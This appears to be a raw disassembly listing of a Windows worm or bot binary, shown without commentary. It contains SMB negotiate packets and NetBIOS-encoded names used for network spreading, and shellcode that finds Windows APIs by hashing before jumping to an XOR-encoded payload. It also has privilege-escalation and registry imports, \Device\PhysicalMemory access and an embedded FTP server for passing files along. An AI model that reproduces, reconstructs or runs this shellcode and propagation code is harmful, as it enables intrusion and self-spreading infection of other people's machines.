dw 1D6h
aGettimeformata db 'GetTimeFormatA',0
align 4
dd 6547013Fh, 74614474h, 726F4665h, 4174616Dh, 1B90000h
aGetsystemdirec db 'GetSystemDirectoryA',0
dd 6547016Ch, 636F4C74h, 49656C61h, 416F666Eh, 3B30000h
dd 7274736Ch, 41706D63h, 1520000h
aGetexitcodepro db 'GetExitCodeProcess',0
align 10h
db 87h ; ‡
db 2, 50h, 65h
aEknamedpipe db 'ekNamedPipe',0
aM_2 db 'Œ',0
aDuplicatehandl db 'DuplicateHandle',0
a__1 db '_',0
aCreatepipe db 'CreatePipe',0
align 10h
db 0AEh ; ®
db 2, 52h, 65h
aAdprocessmemor db 'adProcessMemory',0
dd 704F027Ch, 72506E65h, 7365636Fh, 3510073h, 6D726554h
dd 74616E69h, 6F725065h, 73736563h, 28E0000h, 636F7250h
dd 33737365h, 78654E32h, 28C0074h, 636F7250h, 33737365h
dd 72694632h, 7473h, 6547013Dh, 72754374h, 746E6572h, 65726854h
dd 6461h, 6F4C024Eh, 416C6163h, 636F6C6Ch, 3BC0000h, 7274736Ch
dd 6E797063h, 3140041h, 46746553h, 54656C69h, 656D69h
dd 6547015Dh, 6C694674h, 6D695465h, 1E90065h
aGetwindowsdire db 'GetWindowsDirectoryA',0
align 2
dw 16Bh
aGetlocaltime db 'GetLocalTime',0
align 2
db 'Å',0
aFindclose db 'FindClose',0
db 'Ó',0
aFindnextfilea db 'FindNextFileA',0
db 'É',0
aFindfirstfilea db 'FindFirstFileA',0
align 4
db 0BAh ; º
db 2, 52h, 65h
aMovedirectorya db 'moveDirectoryA',0
align 4
aKernel32_dll_0 db 'KERNEL32.dll',0
align 2
db '&',0
aCharlowera db 'CharLowerA',0
align 4
db 0D5h ; Õ
db 2, 77h, 73h
aPrintfa db 'printfA',0
db 97h ; —
db 1, 49h, 73h
aCharalphanumer db 'CharAlphaNumericA',0
dw 23Ah
aSendmessagea_0 db 'SendMessageA',0
align 2
dw 0FCh
aGetclassname_0 db 'GetClassNameA',0
aUser32_dll_0 db 'USER32.dll',0
align 2
dw 234h
aSetsecurityinf db 'SetSecurityInfo',0
dd 6553021Fh, 746E4574h, 73656972h, 63416E49h, 416Ch, 6547010Eh
dd 63655374h, 74697275h, 666E4979h, 1C006Fh
aAdjusttokenp_0 db 'AdjustTokenPrivileges',0
dw 14Dh
aLookupprivil_0 db 'LookupPrivilegeValueA',0
dw 1AAh
aOpenprocesst_0 db 'OpenProcessToken',0
align 2
dw 123h
aGetusernamea_0 db 'GetUserNameA',0
align 2
dw 1F9h
aRegsetvaluee_0 db 'RegSetValueExA',0
align 4
db 0E2h ; â
db 1, 52h, 65h
aGopenkeyexa db 'gOpenKeyExA',0
db 0C9h ; É
db 1, 52h, 65h
aGclosekey db 'gCloseKey',0
dw 1ECh
aRegqueryvalu_0 db 'RegQueryValueExA',0
align 2
aAdvapi32_dll_0 db 'ADVAPI32.dll',0
align 4
db 7
db 1, 53h, 68h
aEllexecutea db 'ellExecuteA',0
db 'Ä',0
aShgetspecialfo db 'SHGetSpecialFolderPathA',0
aShell32_dll_0 db 'SHELL32.dll',0
aA db 'A',0
aWsasocketa_0 db 'WSASocketA',0
align 4
aWs2_32_dll_0 db 'WS2_32.dll',0
align 4
db 6
align 2
aWnetaddconne_1 db 'WNetAddConnection2A',0
aMpr_dll_0 db 'MPR.dll',0
aC db 'C',0
aGetudptable_0 db 'GetUdpTable',0
aIphlpapi_dll_0 db 'iphlpapi.dll',0
align 2
dw 1Dh
aGetuserprofile db 'GetUserProfileDirectoryA',0
align 2
aUserenv_dll db 'USERENV.dll',0
dw 206h
aHeapalloc db 'HeapAlloc',0
dw 20Ch
aHeapfree db 'HeapFree',0
align 2
dw 1D8h
aGettimezoneinf db 'GetTimeZoneInformation',0
align 4
db 0BEh ; ¾
db 1, 47h, 65h
aTsystemtime db 'tSystemTime',0
db 1Eh
db 2, 49h, 6Eh
aTerlockeddecre db 'terlockedDecrement',0
align 10h
db 22h ; "
db 2, 49h, 6Eh
aTerlockedincre db 'terlockedIncrement',0
align 4
dd 655202C7h, 656D7573h, 65726854h, 6461h, 6C540359h, 74655373h
dd 756C6156h, 2CC0065h, 556C7452h, 6E69776Eh, 29D0064h
dd 73696152h, 63784565h, 69747065h, 6E6Fh, 654701AFh, 61745374h
dd 70757472h, 6F666E49h, 1080041h, 43746547h, 616D6D6Fh
dd 694C646Eh, 41656Eh, 654701DEh, 72655674h, 6E6F6973h
dd 1500000h
aGetenvironment db 'GetEnvironmentVariableA',0
db 0Ah
db 2, 48h, 65h
aApdestroy db 'apDestroy',0
dw 208h
aHeapcreate db 'HeapCreate',0
align 4
db 78h ; x
db 3, 56h, 69h
aRtualfree db 'rtualFree',0
dw 375h
aVirtualalloc db 'VirtualAlloc',0
align 2
dw 210h
aHeaprealloc db 'HeapReAlloc',0
db 2Ch ; ,
db 2, 49h, 73h
aBadwriteptr db 'BadWritePtr',0
db 19h
db 2, 49h, 6Eh
aItializecritic db 'itializeCriticalSection',0
db 3Eh ; >
db 1, 47h, 65h
aTcurrentthread db 'tCurrentThreadId',0
align 2
dw 356h
aTlsalloc db 'TlsAlloc',0
align 2
dw 31Dh
aSetlasterror db 'SetLastError',0
align 2
dw 358h
aTlsgetvalue db 'TlsGetValue',0
db 19h
db 3, 53h, 65h
aThandlecount db 'tHandleCount',0
align 2
dw 1B1h
aGetstdhandle db 'GetStdHandle',0
align 2
dw 15Eh
aGetfiletype db 'GetFileType',0
db 62h ; b
db 3, 55h, 6Eh
aHandledexcepti db 'handledExceptionFilter',0
align 10h
db 3Ah ; :
db 2, 4Ch, 43h
aMapstringa db 'MapStringA',0
align 10h
db 3Bh ; ;
db 2, 4Ch, 43h
aMapstringw db 'MapStringW',0
align 10h
db 12h
db 2, 48h, 65h
aApsize db 'apSize',0
align 4
db 3Dh ; =
db 3, 53h, 65h
aTunhandledexce db 'tUnhandledExceptionFilter',0
dw 32Ch
aSetstdhandle db 'SetStdHandle',0
align 2
dw 0FCh
aGetcpinfo db 'GetCPInfo',0
dw 0F5h
aGetacp db 'GetACP',0
align 10h
db 8Bh ; ‹
db 1, 47h, 65h
aToemcp db 'tOEMCP',0
align 4
aA_0 db 'í',0
aFreeenvironmen db 'FreeEnvironmentStringsA',0
aU db 'î',0
aFreeenvironm_0 db 'FreeEnvironmentStringsW',0
db 4Dh ; M
db 1, 47h, 65h
aTenvironmentst db 'tEnvironmentStrings',0
db 4Fh ; O
db 1, 47h, 65h
aTenvironment_0 db 'tEnvironmentStringsW',0
align 2
dw 1B2h
aGetstringtypea db 'GetStringTypeA',0
align 4
dd 654701B5h, 72745374h, 54676E69h, 57657079h, 0E50000h
dd 73756C46h, 6C694668h, 66754265h, 73726566h, 2290000h
dd 61427349h, 61655264h, 72745064h, 2260000h, 61427349h
dd 646F4364h, 72745065h, 3050000h, 45746553h, 664F646Eh
dd 656C6946h, 340000h, 706D6F43h, 53657261h, 6E697274h
dd 4167h, 6F430035h, 7261706Dh, 72745365h, 57676E69h, 3080000h
aSetenvironment db 'SetEnvironmentVariableA',0
aOleaut32_dll db 'OLEAUT32.dll',0
align 4
dd 276h dup(0)
dword_43A000 dd 0 dd offset sub_405B98
dd offset sub_418D66
dd offset loc_42921D
dword_43A010 dd 0 dword_43A014 dd 0 dd offset sub_42B87B
dd offset sub_42C118
dd offset sub_432AA0
dd offset sub_4320E6
dword_43A028 dd 0 dword_43A02C dd 0 dd offset sub_42C1C0
dword_43A034 dd 0 dword_43A038 dd 0 dd offset sub_4320F7
dword_43A040 dd 4 dup(0) byte_43A050 db 90h ; DATA XREF: sub_40126C+B2�o
db 42h, 90h, 42h
db 90h
dd offset loc_429042
align 4
dword_43A05C dd 10FF8h, 0 dword_43A064 dd 10FF8h dword_43A068 dd 7FFDF020h, 0 dword_43A070 dd 424D53FFh, 72h, 0C8531800h, 3 dup(0) dd 13370000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_43A0F8 dd 424D53FFh, 73h, 0C8071800h, 3 dup(0) dd 13370000h, 0
dd 0FF0Ch, 0A110400h, 2 dup(0)
dword_43A128 dd 0 dd 800000D4h, 2 dup(0)
unk_43A138 db 81h ; ; DATA XREF: sub_401766+A�o
db 2 dup(0), 44h
aCkfdenecfdeffc db ' CKFDENECFDEFFCFGEFFCCACACACACACA',0
aCacacacacacaca db ' CACACACACACACACACACACACACACACAAA',0
dd 0
dword_43A184 dd 158h
; =============== S U B R O U T I N E =======================================
sub_43A188 proc near ; DATA XREF: .text:0040181B�o
push ebx
push esi
push edi
sub sp, 80h
mov esi, esp
call sub_43A284
push dword ptr [esi]
push 63D61209h
call sub_43A29A
mov [esi+8], eax
call sub_43A24D
push dword ptr [esi+4]
push 0CA2BD06Bh
call sub_43A29A
mov [esi+0Ch], eax
call sub_43A1FF
push dword ptr [esi+4]
push 4C0297FAh
call sub_43A29A
xor ebx, ebx
push 410h
push ebx
call eax
mov ebx, eax
push esi
mov esi, [esi+10h]
mov edi, eax
mov ecx, 410h
rep movsb
pop esi
xor eax, eax
push eax
push eax
push eax
push ebx
push eax
push eax
call dword ptr [esi+0Ch]
mov eax, [esi+8]
add sp, 80h
pop edi
pop esi
pop ebx
jmp eax
sub_43A188 endp
; =============== S U B R O U T I N E =======================================
sub_43A1FF proc near ; CODE XREF: sub_43A188+33�p
var_20 = dword ptr -20h
var_14 = dword ptr -14h
pusha
call sub_43A228
mov eax, [esp+20h+var_14]
lea ebx, [eax+7Ch]
add dword ptr [ebx+3Ch], 5
add dword ptr [ebx+28h], 1000h
and dword ptr [ebx+28h], 0FFFFF000h
mov eax, [esp+20h+var_20]
add esp, 14h
push eax
xor eax, eax
retn
sub_43A1FF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_43A228 proc near ; CODE XREF: sub_43A1FF+1�p
xor edx, edx
push dword ptr fs:[edx]
mov fs:[edx], esp
xor ebx, ebx
mov eax, 42904290h
loc_43A237: ; CODE XREF: sub_43A228+1A�j
xor ecx, ecx
mov cl, 2
mov edi, ebx
repe scasd
jz short loc_43A244
inc ebx
jmp short loc_43A237
; ---------------------------------------------------------------------------
loc_43A244: ; CODE XREF: sub_43A228+17�j
mov [esi+10h], edi
pop dword ptr fs:[edx]
pop eax
popa
retn
sub_43A228 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_43A24D proc near ; CODE XREF: sub_43A188+1E�p
pusha
mov edi, 7FFDF020h
mov ebx, [edi]
mov eax, [esi+8]
mov [edi], eax
mov edi, [edi-8]
add edi, 178h
mov ecx, edi
loc_43A265: ; CODE XREF: sub_43A24D+1E�j
cmp [ecx], ebx
jz short loc_43A26D
mov ecx, [ecx]
jmp short loc_43A265
; ---------------------------------------------------------------------------
loc_43A26D: ; CODE XREF: sub_43A24D+1A�j
mov edx, edi
loc_43A26F: ; CODE XREF: sub_43A24D+2A�j
cmp [edx+4], ebx
jz short loc_43A279
mov edx, [edx+4]
jmp short loc_43A26F
; ---------------------------------------------------------------------------
loc_43A279: ; CODE XREF: sub_43A24D+25�j
mov [ecx], edx
mov [edx+4], ecx
mov byte ptr [ebx-3], 1
popa
retn
sub_43A24D endp
; =============== S U B R O U T I N E =======================================
sub_43A284 proc near ; CODE XREF: sub_43A188+A�p
mov eax, ds:7FFDF00Ch
mov eax, [eax+1Ch]
mov ebx, [eax+8]
mov [esi], ebx
mov eax, [eax]
mov eax, [eax+8]
mov [esi+4], eax
retn
sub_43A284 endp
; =============== S U B R O U T I N E =======================================
sub_43A29A proc near ; CODE XREF: sub_43A188+16�p
; sub_43A188+2B�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
pusha
mov ebp, [esp+20h+arg_4]
mov eax, [ebp+3Ch]
mov edx, [ebp+eax+78h]
add edx, ebp
mov ecx, [edx+18h]
mov ebx, [edx+20h]
add ebx, ebp
loc_43A2B0: ; CODE XREF: sub_43A29A+33�j
jecxz short loc_43A2EA
dec ecx
mov esi, [ebx+ecx*4]
add esi, ebp
xor edi, edi
xor eax, eax
cld
loc_43A2BD: ; CODE XREF: sub_43A29A+2D�j
lodsb
cmp al, ah
jz short loc_43A2C9
ror edi, 0Dh
add edi, eax
jmp short loc_43A2BD
; ---------------------------------------------------------------------------
loc_43A2C9: ; CODE XREF: sub_43A29A+26�j
cmp edi, [esp+20h+arg_0]
jnz short loc_43A2B0
mov ebx, [edx+24h]
add ebx, ebp
mov cx, [ebx+ecx*2]
mov ebx, [edx+1Ch]
add ebx, ebp
mov eax, [ebx+ecx*4]
add eax, ebp
mov [esp+20h+var_4], eax
popa
retn 8
; ---------------------------------------------------------------------------
loc_43A2EA: ; CODE XREF: sub_43A29A:loc_43A2B0�j
; sub_43A29A:loc_43A2EA�j
jmp short loc_43A2EA
sub_43A29A endp
; ---------------------------------------------------------------------------
align 10h
dword_43A2F0 dd 0F254C481h, 0FFFFhdword_43A2F8 dd 23h dword_43A2FC dd 60h dword_43A300 dd 62B0606h, 2050501h, 0A0hdword_43A30C dd 30h ; sub_401F54+7C�o ...
dword_43A310 dd 0A1h dword_43A314 dd 3 aCccc db 'CCCC',0 ; DATA XREF: sub_40126C+153�o
align 10h
loc_43A320: ; DATA XREF: sub_40126C+E8�o
jmp short near ptr dword_43A328
; ---------------------------------------------------------------------------
align 8
dword_43A328 dd 0 aSSSExD db '%s %s -> %s (Ex: %d)',0 ; DATA XREF: .text:00401911�o
; sub_403B9B+155�o ...
align 8
aD1 db 'd1',0 ; DATA XREF: sub_402675+FC�o
; sub_40A9FE+973F�o
align 4
dd 2 dup(0)
db 3 dup(0)
dword_43A357 dd 33314344h ; .text:00401967�r ...
db 35h
dd 7 dup(0)
dword_43A378 dd 87h ; sub_40A9FE+5F42�r ...
off_43A37C dd offset sub_403B9B ; DATA XREF: sub_402675+174�r
dword_43A380 dd 0 ; .text:00401960�r ...
dword_43A384 dd 1 dd 3264h, 2 dup(0)
dd 44000000h, 3243h, 7 dup(0)
dd 87h, 403D84h, 0
dd 1, 3364h, 2 dup(0)
db 3 dup(0)
byte_43A3D7 db 44h ; DATA XREF: sub_406D7F+296�o
dd 3343h, 7 dup(0)
dd 87h, 404134h, 0
dd 1, 736B6Eh, 2 dup(0)
db 3 dup(0)
byte_43A417 db 4Eh ; DATA XREF: sub_406D7F+498�o
dd 3250h, 7 dup(0)
dd 1BDh, 4063C0h, 0
dd 1, 656Eh, 2 dup(0)
db 3 dup(0)
byte_43A457 db 4Eh ; DATA XREF: sub_406D7F+2F6�o
dd 3245h, 7 dup(0)
dd 8Bh, 4066E2h, 0
dd 1, 61h, 2 dup(0)
dd 41000000h, 4E53h, 7 dup(0)
dd 8Bh, 4017B8h, 0
dd 1, 31626Eh, 2 dup(0)
db 3 dup(0)
byte_43A4D7 db 4Eh ; DATA XREF: sub_406D7F+39D�o
dd 42h, 7 dup(0)
dd 8Bh, 4059BFh, 2 dup(0)
dd 32626Eh, 2 dup(0)
dd 4E000000h, 42h, 7 dup(0)
dd 1BDh, 4059BFh, 2 dup(0)
dd 76h, 2 dup(0)
dd 56000000h, 434Eh, 7 dup(0)
dd 170Ch, 408169h, 0
dd 1, 6276h, 2 dup(0)
dd 56000000h, 42434Eh, 7 dup(0)
dd 170Ch, 409645h, 0
dd 1, 73h, 2 dup(0)
db 3 dup(0)
off_43A5D7 dd offset byte_565253 ; DATA XREF: sub_406D7F+3FD�o
align 4
dd 7 dup(0)
dd 1BDh, 4073A2h, 0
dd 1, 656B77h, 2 dup(0)
dd 57000000h, 454Bh, 7 dup(0)
dd 8Bh, 409D5Dh, 0
dd 1, 31656B77h, 2 dup(0)
dd 57000000h, 31454Bh, 7 dup(0)
dd 1BDh, 409D5Dh, 0
dd 1, 6F6B77h, 2 dup(0)
dd 57000000h, 4F4Bh, 7 dup(0)
dd 8Bh, 409DF7h, 0
dd 1, 316F6B77h, 2 dup(0)
dd 57000000h, 314F4Bh, 7 dup(0)
dd 1BDh, 409DF7h, 0
dd 1, 736B77h, 2 dup(0)
dd 57000000h, 534Bh, 7 dup(0)
dd 8Bh, 409FC8h, 0
dd 1, 31736B77h, 2 dup(0)
dd 57000000h, 31534Bh, 7 dup(0)
dd 1BDh, 409FC8h, 0
dd 1, 10h dup(0)
dword_43A7C8 dd 3164h, 2 dup(0) dd 1000000h, 73h, 2 dup(0)
dd 1000000h
dword_43A7E8 dd 3364h, 2 dup(0) dd 1000000h, 316F6B77h, 2 dup(0)
dd 1000000h
dword_43A808 dd 656Eh, 2 dup(0) dd 1000000h, 31626Eh, 2 dup(0)
dd 1000000h
dword_43A828 dd 3164h, 2 dup(0) dd 1000000h, 3264h, 2 dup(0)
dd 1000000h
dword_43A848 dd 73h, 2 dup(0) dd 1000000h, 736B6Eh, 2 dup(0)
dd 1000000h
dword_43A868 dd 76h, 2 dup(0) dd 1000000h, 6276h, 2 dup(0)
dd 1000000h
dword_43A888 dd 73h, 2 dup(0) dd 1000000h, 736B77h, 2 dup(0)
dd 1000000h
dword_43A8A8 dd 3364h, 2 dup(0) dd 1000000h, 31656B77h, 2 dup(0)
dd 1000000h
dword_43A8C8 dd 2 dword_43A8CC dd 2 dword_43A8D0 dd 2 dword_43A8D4 dd 2 dword_43A8D8 dd 2 dword_43A8DC dd 2 dword_43A8E0 dd 2 dword_43A8E4 dd 2 dword_43A8E8 dd 0E983C929h, 0FFFFE8B0h, 5EC0FFFFh, 970E7681h, 839CBE56h
; DATA XREF: .text:004017FC�o
; sub_403970+4B�o ...
dd 0F4E2FCEEh, 0D1553C6Bh, 6341AF7Fh, 0F0353668h, 0D93572B3h
dd 99C2DDABh, 175157EFh, 0C3354ED8h, 0D55557B7h, 9D35621Ch
dd 57E6779h, 0E87ED23Bh, 91749790h, 68559496h, 0B49A02ACh
dd 0C335B3E2h, 0FA5557B3h, 17F55A1Ch, 77BF4AC8h, 15357A94h
dd 0FDA272FBh, 0F8656754h, 178E151Ch, 0EC355AD7h, 0DC35FB8Bh
dd 12D6089Fh, 0CC5258D9h, 0CFD88068h, 0AE8D3EF1h, 0AECD21FFh
dd 4C4102C8h, 60539DFFh, 4A4106ACh, 0FA5BDFC8h, 9EB6BB16h
dd 63BC3CC2h, 95673E47h, 63E9FB62h, 0CFED0541h, 0CFFD05C4h
dd 4C4105D4h, 0F6BA3EF1h, 7D3705F1h, 861A3E02h, 63E991E7h
dd 0CDAE3C41h, 0F46EA9C2h, 7590FB33h, 0CF68A9C0h, 0F46EA9C2h
dd 0D5381F72h, 0CC68A9C0h, 63EB02C3h, 7BD6C547h, 0CBC790EEh
dd 63EB8068h, 0F8D43047h, 0F1DD3EF1h, 0CCD4B31Eh, 15727FCEh
dd 15FA3C70h, 6F7E6775h, 0B1FCA83Dh, 0F921469h, 37862C1Ah
dd 0EED6FD3Ch, 63A8E569h, 4A4112E2h, 0CDEC01CCh, 9DD407C6h
dd 0CDEB07C6h, 31D68668h, 0CF70534Eh, 63D48068h, 4C416168h
dd 1F42011Ch, 4A413253h, 0F46EA9C5h, 0FC5E9878h, 6368A9C4h
dd 9CBE5647h, 0
dd 159h
aEftpdDTotalDIn db ' (EFTPD): (%d), Total -> (%d in %s)',0 ; DATA XREF: sub_401990+9A�o
aSD_0 db ' (%s: %d),',0 ; DATA XREF: sub_401990+4C�o
align 4
aSStats db '%s (Stats):',0 ; DATA XREF: sub_401990+1A�o
aCCCCCC db '%c%c%c%c%c%c',0 ; DATA XREF: sub_401A77+66�o
; sub_40A9FE+5B34�o
align 4
aSCCCCC db '%s%c%c%c%c%c',0 ; DATA XREF: sub_401AF0+6B�o
align 4
aS_6 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_401B6E:loc_401E31�o
; sub_406429+251�o ...
align 10h
aSSSDSSSSSSSS_0 db '%s %s %s %d >> %s %s %s %s %s >> %s %s %s >> %s %s %s %s >> %s %s'
; DATA XREF: sub_401B6E+274�o
; sub_406429+210�o
db ' %s >> %s %s%s %s %s',0Dh,0Ah,0
aSSSDSSSSSSSSSS db '%s %s %s %d >> %s %s %s %s %s >> %s %s %s %s >> %s %s %s >> %s %s'
; DATA XREF: sub_401B6E+1E9�o
; sub_406429+180�o
db '%s %s %s',0Dh,0Ah,0
aSDDDDD_exe db '%s%d%d%d%d%d.exe',0 ; DATA XREF: sub_401B6E+137�o
; sub_40541D+285�o ...
align 4
off_43AB68 dd offset dword_5C005C ; DATA XREF: sub_401E9E+16�o
align 10h
off_43AB70 dd offset dword_49005C ; DATA XREF: sub_401E9E+B�o
dd offset loc_43004E+2
dd 24h
dword_43AB7C dd 252E7325h, 73252E73h, 73252Eh ; sub_402CE9+398�o
dword_43AB88 dd 78h ; sub_401F54+A3�o ...
dword_43AB8C dd 2Eh ; sub_405C99+2D�o ...
dword_43AB90 dd 49207325h, 7463616Eh, 657669hdword_43AB9C dd 28207325h, 29504943h, 7325203Ah, 0aSSSISS_ db '%s %s, %s: %i, %s: %s.',0 ; DATA XREF: sub_4020BA+D3�o
align 4
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: sub_40222C+3B�o
aSSAtSDAfterDMi db '%s %s at %s:%d after %d minute(s).',0 ; DATA XREF: sub_402459+1D2�o
align 4
aSSDThreadDSubT db '%s %s:%d, Thread: %d, Sub-thread: %d.',0 ; DATA XREF: sub_402459+119�o
align 4
aSSD_0 db '%s %s: <%d>',0 ; DATA XREF: sub_402459+98�o
; sub_423C7A+A5�o ...
aSSSSDOpen_ db '%s %s%s: %s:%d open.',0 ; DATA XREF: sub_402675+C3�o
align 10h
aZwopensection db 'ZwOpenSection',0 ; DATA XREF: sub_402822+23�o
align 10h
aRtlinitunicode db 'RtlInitUnicodeString',0 ; DATA XREF: sub_402822+1B�o
align 4
aNtdll_dll db 'ntdll.dll',0 ; DATA XREF: sub_402822�o
align 4
aCurrent_user db 'CURRENT_USER',0 ; DATA XREF: sub_402889+5D�o
align 4
off_43AC84 dd offset aRy6iq0udbphN2n+0Ch ; DATA XREF: sub_40292F+31�o
aEvicePhysicalm:
unicode 0, <evice\PhysicalMemory>,0
align 4
aSesecuritypriv db 'SeSecurityPrivilege',0 ; DATA XREF: sub_402BD7:loc_402C3E�o
a503 db '503',0Dh,0Ah,0 ; DATA XREF: sub_402CE9:loc_403222�o
align 10h
a221 db '221',0Dh,0Ah,0 ; DATA XREF: sub_402CE9+51E�o
align 4
aQuit db 'QUIT',0 ; DATA XREF: sub_402CE9+511�o
align 10h
a425 db '425',0Dh,0Ah,0 ; DATA XREF: sub_402CE9:loc_4031D8�o
align 4
aSS_2 db '%s -> %s',0 ; DATA XREF: sub_402CE9+494�o
; sub_402CE9+4C3�o
align 4
a226 db '226',0Dh,0Ah,0 ; DATA XREF: sub_402CE9+440�o
align 4
a150 db '150',0Dh,0Ah,0 ; DATA XREF: sub_402CE9+3DB�o
align 4
aRetr db 'RETR',0 ; DATA XREF: sub_402CE9+3CB�o
align 4
a200 db '200',0Dh,0Ah,0 ; DATA XREF: sub_402CE9+3A3�o
align 4
aXX db '%x%x',0Ah,0 ; DATA XREF: sub_402CE9+362�o
align 4
aS db '%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^',0Ah ; DATA XREF: sub_402CE9+324�o
db ']',0
aPort db 'PORT',0 ; DATA XREF: sub_402CE9+2F0�o
align 4
a230 db '230',0Dh,0Ah,0 ; DATA XREF: sub_402CE9+2CB�o
align 4
aPass db 'PASS',0 ; DATA XREF: sub_402CE9+2BF�o
align 4
a331 db '331',0Dh,0Ah,0 ; DATA XREF: sub_402CE9+29A�o
align 4
aUser db 'USER',0 ; DATA XREF: sub_402CE9+28E�o
align 4
aSS_1 db '%s %s',0 ; DATA XREF: sub_402CE9+274�o
; sub_4033A3+C8�o ...
align 4
a220 db '220',0Dh,0Ah,0 ; DATA XREF: sub_402CE9:loc_402EC3�o
align 4
aRb db 'rb',0 ; DATA XREF: sub_4032D2+2B�o
; .text:0040A296�o
align 10h
aSSDS db '%s %s %d %s',0 ; DATA XREF: sub_4033A3+75�o
; sub_423654+36�o
align 10h
byte_43AD90 db 1 ; DATA XREF: sub_4034A5+25�r
align 2
dw 2
dd 80004h, 200010h, 800040h
dword_43ADA0 dd 800000h, 400000h, 200000h, 100000h, 80000h, 40000h
; DATA XREF: sub_4034A5+C6�r
; sub_4034A5+D8�r
dd 20000h, 10000h, 8000h, 4000h, 2000h, 1000h, 800h, 400h
dd 200h, 100h, 80h, 40h, 20h, 10h, 8, 4, 2, 1
byte_43AE00 db 38h ; DATA XREF: sub_4034A5:loc_4034B5�r
db 30h, 28h, 20h
dd 81018h, 21293139h, 1091119h, 222A323Ah, 20A121Ah, 232B333Bh
dd 262E363Eh, 60E161Eh, 252D353Dh, 50D151Dh, 242C343Ch
dd 40C141Ch, 30B131Bh
dword_43AE38 dd 6040201h, 0E0C0A08h, 1513110Fh, 1C1B1917h, 170A100Dh
; DATA XREF: sub_4034A5+6A�r
dd 1B020400h, 914050Eh, 30B1216h, 60F0719h, 10C131Ah
dword_43AE60 dd 241E3328h, 271D362Eh, 2F202C32h, 3726302Bh, 292D3421h
; DATA XREF: sub_4034A5:loc_40355B�r
dd 1F1C2331h
dword_43AE78 dd 1010400h, 0 ; sub_403721+148�r
dd 10000h, 1010404h, 1010004h, 10404h, 4, 10000h, 400h
dd 1010400h, 1010404h, 400h, 1000404h, 1010004h, 1000000h
dd 4, 404h, 2 dup(1000400h), 2 dup(10400h), 2 dup(1010000h)
dd 1000404h, 10004h, 2 dup(1000004h), 10004h, 0
dd 404h, 10404h, 1000000h, 10000h, 1010404h, 4, 1010000h
dd 1010400h, 2 dup(1000000h), 400h, 1010004h, 10000h, 10400h
dd 1000004h, 400h, 4, 1000404h, 10404h, 1010404h, 10004h
dd 1010000h, 1000404h, 1000004h, 404h, 10404h, 1010400h
dd 404h, 2 dup(1000400h), 0
dd 10004h, 10400h, 0
dd 1010004h
dword_43AF78 dd 80108020h ; sub_403721+189�r
dd 80008000h, 8000h, 108020h, 100000h, 20h, 80100020h
dd 80008020h, 80000020h, 80108020h, 80108000h, 80000000h
dd 80008000h, 100000h, 20h, 80100020h, 108000h, 100020h
dd 80008020h, 0
dd 80000000h, 8000h, 108020h, 80100000h, 100020h, 80000020h
dd 0
dd 108000h, 8020h, 80108000h, 80100000h, 8020h, 0
dd 108020h, 80100020h, 100000h, 80008020h, 80100000h, 80108000h
dd 8000h, 80100000h, 80008000h, 20h, 80108020h, 108020h
dd 20h, 8000h, 80000000h, 8020h, 80108000h, 100000h, 80000020h
dd 100020h, 80008020h, 80000020h, 100020h, 108000h, 0
dd 80008000h, 8020h, 80000000h, 80100020h, 80108020h, 108000h
dword_43B078 dd 208h ; sub_403721+152�r
dd 8020200h, 0
dd 8020008h, 8000200h, 0
dd 20208h, 8000200h, 20008h, 2 dup(8000008h), 20000h, 8020208h
dd 20008h, 8020000h, 208h, 8000000h, 8, 8020200h, 200h
dd 20200h, 8020000h, 8020008h, 20208h, 8000208h, 20200h
dd 20000h, 8000208h, 8, 8020208h, 200h, 8000000h, 8020200h
dd 8000000h, 20008h, 208h, 20000h, 8020200h, 8000200h
dd 0
dd 200h, 20008h, 8020208h, 8000200h, 8000008h, 200h, 0
dd 8020008h, 8000208h, 20000h, 8000000h, 8020208h, 8, 20208h
dd 20200h, 8000008h, 8020000h, 8000208h, 208h, 8020000h
dd 20208h, 8, 8020008h, 20200h
dword_43B178 dd 802001h ; sub_403721+193�r
dd 2 dup(2081h), 80h, 802080h, 800081h, 800001h, 2001h
dd 0
dd 2 dup(802000h), 802081h, 81h, 0
dd 800080h, 800001h, 1, 2000h, 800000h, 802001h, 80h, 800000h
dd 2001h, 2080h, 800081h, 1, 2080h, 800080h, 2000h, 802080h
dd 802081h, 81h, 800080h, 800001h, 802000h, 802081h, 81h
dd 2 dup(0)
dd 802000h, 2080h, 800080h, 800081h, 1, 802001h, 2 dup(2081h)
dd 80h, 802081h, 81h, 1, 2000h, 800001h, 2001h, 802080h
dd 800081h, 2001h, 2080h, 800000h, 802001h, 80h, 800000h
dd 2000h, 802080h
dword_43B278 dd 100h ; sub_403721+164�r
dd 2080100h, 2080000h, 42000100h, 80000h, 100h, 40000000h
dd 2080000h, 40080100h, 80000h, 2000100h, 40080100h, 42000100h
dd 42080000h, 80100h, 40000000h, 2000000h, 2 dup(40080000h)
dd 0
dd 40000100h, 2 dup(42080100h), 2000100h, 42080000h, 40000100h
dd 0
dd 42000000h, 2080100h, 2000000h, 42000000h, 80100h, 80000h
dd 42000100h, 100h, 2000000h, 40000000h, 2080000h, 42000100h
dd 40080100h, 2000100h, 40000000h, 42080000h, 2080100h
dd 40080100h, 100h, 2000000h, 42080000h, 42080100h, 80100h
dd 42000000h, 42080100h, 2080000h, 0
dd 40080000h, 42000000h, 80100h, 2000100h, 40000100h, 80000h
dd 0
dd 40080000h, 2080100h, 40000100h
dword_43B378 dd 20000010h ; sub_403721+1A2�r
dd 20400000h, 4000h, 20404010h, 20400000h, 10h, 20404010h
dd 400000h, 20004000h, 404010h, 400000h, 20000010h, 400010h
dd 20004000h, 20000000h, 4010h, 0
dd 400010h, 20004010h, 4000h, 404000h, 20004010h, 10h
dd 2 dup(20400010h), 0
dd offset loc_40400F+1
dd 20404000h, 4010h, 404000h, 20404000h, 20000000h, 20004000h
